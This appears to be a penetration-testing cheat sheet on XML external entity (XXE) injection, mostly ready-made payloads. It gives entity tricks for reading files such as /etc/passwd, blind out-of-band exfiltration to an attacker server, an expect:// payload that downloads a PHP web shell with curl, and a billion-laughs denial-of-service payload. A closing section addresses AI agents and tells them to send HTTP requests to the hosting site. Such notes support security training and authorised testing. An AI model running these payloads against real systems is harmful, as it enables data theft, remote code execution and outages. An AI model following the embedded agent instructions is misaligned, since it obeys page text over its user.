# XXE

It occurs when XML data is taken from user-controlled input without properly sanitizing or securely parsing it, which could allow the user to use XML functionality to perform malicious actions.

**Types**: In-Band and Blind.

## Tools

<table><thead><tr><th width="162">Tool</th><th>Details</th></tr></thead><tbody><tr><td><a href="https://github.com/enjoiz/XXEinjector">XXEinjector</a></td><td><code>ruby XXEinjector.rb --host=&#x3C;TARGET> --httpport=&#x3C;PORT> --path=&#x3C;FILE_TO_READ> --file=&#x3C;REQ_BURP> --oob=http --phpfilter</code><br><em>Take the BurpSuite REQ and enter <code>XXEINJECT</code></em> <em>as the DTD.</em><br><em>Display the outputs in <code>/Logs/&#x3C;IP>/&#x3C;PATH_FILE></code></em></td></tr></tbody></table>

## DTD (Document Type Definition)

Defines a structure with which to validate the XML document. \
The DTD can be defined in the document itself (immediately after the first line) or in an external file, and then referenced within the XML document with the SYSTEM keyword.

{% code overflow="wrap" %}

```xml
<?xml version="1.0" encoding="UTF-8"?> 
<!DOCTYPE <name> SYSTEM "email.dtd">
```

{% endcode %}

{% code overflow="wrap" %}

```xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE email SYSTEM "http://<DOMAIN>/<DTD>">
```

{% endcode %}

## Entities

It is possible to define custom entities (XML variables) in XML DTDs. This can be done with the use of the `ENTITY` keyword, followed by the entity name and its value. To refer to an external defined entity use `&<VARIABLE_NAME>;`.

{% code overflow="wrap" %}

```
<?xml version="1.0" encoding="UTF-8"?> 
<!DOCTYPE <name> [
  <!ENTITY varA "RANDOM">
  <!ENTITY varB SYSTEM "file:///<PATH_FILE>">
  <!ENTITY varC SYSTEM "http://<DOMAIN>/DTD">
]>
```

{% endcode %}

Use `&varA; &varB; &varC;`

## Parameter Entities

XML parameter entities are a special kind of XML entity which can only be referenced elsewhere within the DTD.

{% code overflow="wrap" %}

```
<!DOCTYPE foo [ 
    <!ENTITY % xxe SYSTEM "http://web-attacker.com"> 
    %xxe; 
]>
```

{% endcode %}

Use `%xxe;`

## Attacks

### Read

If outdated XML libraries are used and no filtering or cleaning is applied on our XML input, we may be able to read local files.

#### Simple

{% code overflow="wrap" %}

```
<!DOCTYPE <field_name_display> [
  <!ENTITY varX SYSTEM "file:///etc/passwd">
]>
```

{% endcode %}

Define `varX` then use it in the field that is displayed (`&varX;`)

#### PHP wrapper

Only with PHP web applications. If there are special XML characters in the file (such as `<` `>` `&` or binary) that would break the reference and not be used for the reference.

{% code overflow="wrap" %}

```
<!DOCTYPE <field_name_display> [
  <!ENTITY varX SYSTEM "php://filter/convert.base64-encode/resource=index.php">
]>
```

{% endcode %}

#### CDATA

Other method to extract any type of data (including binary data) for any web application backend.\
Use the `CDATA` tag: `<![CDATA[ FILE_CONTENT ]]>` \
The XML parser considers this part as raw data.&#x20;

<details>

<summary>NOTE</summary>

{% code overflow="wrap" %}

```xml
<!DOCTYPE <nome_campo_display> [
  <!ENTITY begin "<![CDATA[">
  <!ENTITY file SYSTEM "file://<FILE>">
  <!ENTITY end "]]>">
  <!ENTITY joined "&begin;&file;&end;">
]>
```

{% endcode %}

**This will not work, since XML prevents merging internal and external entities.**

To bypass use `XML Parameter` Entities, a special type of entity that begins with **`%`**.\
The special thing about `XML Parameter Entities` is that if we refer to them from an external source (ex., our server), then they would all be considered external and could be merged.

</details>

{% tabs %}
{% tab title="1" %}
{% code title="xxe.dtd" overflow="wrap" %}

```
<!ENTITY % begin "<![CDATA[">
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % end "]]>">
<!ENTITY % pwn "<!ENTITY content '%begin;%file;%end;'>">
```

{% endcode %}

{% code overflow="wrap" %}

```bash
sudo python3 -m http.server 8000
```

{% endcode %}

{% code overflow="wrap" %}

```
<!DOCTYPE <field_name_display> [
  <!ENTITY % xxe SYSTEM "http://<MY_IP>:8000/xxe.dtd"> 
  %xxe;
  %pwn;
]>
```

{% endcode %}

Then use `&content;`
{% endtab %}

{% tab title="2" %}

<pre class="language-bash" data-overflow="wrap"><code class="lang-bash"><strong>echo '&#x3C;!ENTITY joined "%begin;%file;%end;">' > xxe.dtd
</strong>sudo python3 -m http.server 8000
</code></pre>

{% code overflow="wrap" %}

```
<!DOCTYPE <field_name_display> [
  <!ENTITY % begin "<![CDATA["> 
  <!ENTITY % file SYSTEM "file:///var/www/html/index.php"> 
  <!ENTITY % end "]]>"> 
  <!ENTITY % xxe SYSTEM "http://<MY_IP>:8000/xxe.dtd"> 
  %xxe;
]>
```

{% endcode %}

Then use `&joined`
{% endtab %}
{% endtabs %}

#### Single item, NO  DOCTYPE

If you only control a single item of data that is placed into a server-side XML document and cannot define or modify a `DOCTYPE` element

{% code overflow="wrap" %}

```xml
<foo xmlns:xi="http://www.w3.org/2001/XInclude">
<xi:include parse="text" href="file:///etc/passwd"/></foo>
```

{% endcode %}

#### Image SVG

{% code overflow="wrap" %}

```xml
<?xml version="1.0" encoding="UTF-8"?> 
<!DOCTYPE avatar [
  <!ENTITY varX SYSTEM "file:///etc/hostname">
]>
<svg xmlns="http://www.w3.org/2000/svg" width="100" height="100">
<text x="10" y="50" font-family="Arial" font-size="8" fill="black">&varX;</text>
</svg>
```

{% endcode %}

### Error

This method does not require a field to be displayed, but it does require the web application to display runtime errors (e.g., PHP errors), as it does not have adequate exception handling for XML input. In that case, it is possible to use this flaw to read the output of the XXE exploit.

{% tabs %}
{% tab title="1" %}
{% code title="xxe.dtd" overflow="wrap" %}

```
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///nonexistent/%file;'>">
%eval;
%error;
```

{% endcode %}

{% code overflow="wrap" %}

```bash
sudo python3 -m http.server 8000
```

{% endcode %}

{% code overflow="wrap" %}

```
<!DOCTYPE foo [
  <!ENTITY % xxe SYSTEM "http://<MY_IP>:8000/xxe.dtd"> 
  %xxe;
]>
```

{% endcode %}
{% endtab %}

{% tab title="2" %}
{% code title="xxe.dtd" overflow="wrap" %}

```
<!ENTITY % file SYSTEM "file:///etc/hosts"> 
<!ENTITY % error "<!ENTITY content SYSTEM '%nonExistingEntity;/%file;'>">
```

{% endcode %}

{% code overflow="wrap" %}

```bash
sudo python3 -m http.server 8000
```

{% endcode %}

{% code overflow="wrap" %}

```
<!DOCTYPE <nome_campo> [ 
  <!ENTITY % remote SYSTEM "http://<MY_IP>:8000/xxe.dtd">
  %remote;
  %error;
]>
```

{% endcode %}
{% endtab %}

{% tab title="No Own External DTD" %}
[Link](https://portswigger.net/web-security/xxe/blind#exploiting-blind-xxe-by-repurposing-a-local-dtd)

Suppose there is a DTD file on the server filesystem at the location `/usr/local/app/schema.dtd`, and this DTD file defines an entity called `custom_entity`.

{% code overflow="wrap" %}

```
<!DOCTYPE foo [
<!ENTITY % local_dtd SYSTEM "file:///usr/local/app/schema.dtd">
<!ENTITY % custom_entity '
<!ENTITY &#x25; file SYSTEM "file:///etc/passwd">
<!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;file:///nonexistent/&#x25;file;&#x27;>">
&#x25;eval;
&#x25;error;
'>
%local_dtd;
]>
```

{% endcode %}

To find a DDT file just use the following payload and see if it returns an error.\
Systems typically always contain DTD files. Ex. linux GNOME desktop environment often have a DTD file at `/usr/share/yelp/dtd/docbookx.dtd`

{% code overflow="wrap" %}

```
<!DOCTYPE foo [
<!ENTITY % local_dtd SYSTEM "file:///usr/share/yelp/dtd/docbookx.dtd">
%local_dtd;
]>
```

{% endcode %}

Since many common systems that include DTD files are open source, you can normally quickly obtain a copy of files through internet search and find an entity that you can redefine.
{% endtab %}
{% endtabs %}

### Blind

Allows you to exfiltrate data without any output fields and without error printing.\
Try with `/etc/hostname` which has no newline characters.

{% tabs %}
{% tab title="1" %}

<pre data-title="xxe.dtd" data-overflow="wrap"><code>&#x3C;!ENTITY % file SYSTEM "file:///etc/passwd">
<strong>&#x3C;!ENTITY % eval "&#x3C;!ENTITY &#x26;#x25; exfiltrate SYSTEM 'http://web-attacker.com/?x=%file;'>">
</strong>%eval;
%exfiltrate;
</code></pre>

{% code overflow="wrap" %}

```bash
sudo python3 -m http.server 8000
```

{% endcode %}

{% code overflow="wrap" %}

```
<!DOCTYPE foo [
  <!ENTITY % xxe SYSTEM "http://<MY_IP>:8000/xxe.dtd"> 
  %xxe;
]>
```

{% endcode %}
{% endtab %}

{% tab title="2" %}
{% code title="xxe.dtd" overflow="wrap" %}

```
<!ENTITY % file SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd"> 
<!ENTITY % oob "<!ENTITY content SYSTEM 'http://<MY_IP>:8000/?content=%file;'>">
```

{% endcode %}

{% code overflow="wrap" %}

```bash
sudo python3 -m http.server 8000
```

{% endcode %}

{% code overflow="wrap" %}

```
<!DOCTYPE <field_name> [ 
  <!ENTITY % remote SYSTEM "http://<MY_IP>:8000/xxe.dtd">
  %remote;
  %oob;
]>
```

{% endcode %}
{% endtab %}
{% endtabs %}

### RCE

We can also execute remote code with XXE.\
Require the PHP **expect** module to be installed and enabled. \
Possible to execute commands and display the response in the displayed field or load a web shell on the server. (Beware of characters not allowed)

{% code overflow="wrap" %}

```bash
echo '<?php system($_REQUEST["cmd"]);?>' > shell.php 
sudo python3 -m http.server 80
```

{% endcode %}

{% code overflow="wrap" %}

```
<!DOCTYPE <field_name> [
  <!ENTITY varX SYSTEM "expect://curl$IFS-O$IFS'<MY_IP>/shell.php'">
]>
```

{% endcode %}

### DoS

Also possible to perform Denial of Server attacks.

{% code overflow="wrap" %}

```
<!DOCTYPE <field_name> [
  <!ENTITY a0 "DOS" >
  <!ENTITY a1 "&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;">
  <!ENTITY a2 "&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;">
  <!ENTITY a3 "&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;">
  <!ENTITY a4 "&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;">
  <!ENTITY a5 "&a4;&a4;&a4;&a4;&a4;&a4;&a4;&a4;&a4;&a4;">
  <!ENTITY a6 "&a5;&a5;&a5;&a5;&a5;&a5;&a5;&a5;&a5;&a5;">
  <!ENTITY a7 "&a6;&a6;&a6;&a6;&a6;&a6;&a6;&a6;&a6;&a6;">
  <!ENTITY a8 "&a7;&a7;&a7;&a7;&a7;&a7;&a7;&a7;&a7;&a7;">
  <!ENTITY a9 "&a8;&a8;&a8;&a8;&a8;&a8;&a8;&a8;&a8;&a8;">
  <!ENTITY a10 "&a9;&a9;&a9;&a9;&a9;&a9;&a9;&a9;&a9;&a9;">
]>
```

{% endcode %}

This payload defines entity `a0` as DOS, refers to it several times with `a1`, then refers to `a1` with `a2`, and so on until the memory of the back-end server runs out due to self-reference cycles.


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://ivalexev.gitbook.io/rednote/pentesting-process/web-attacks/xxe.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
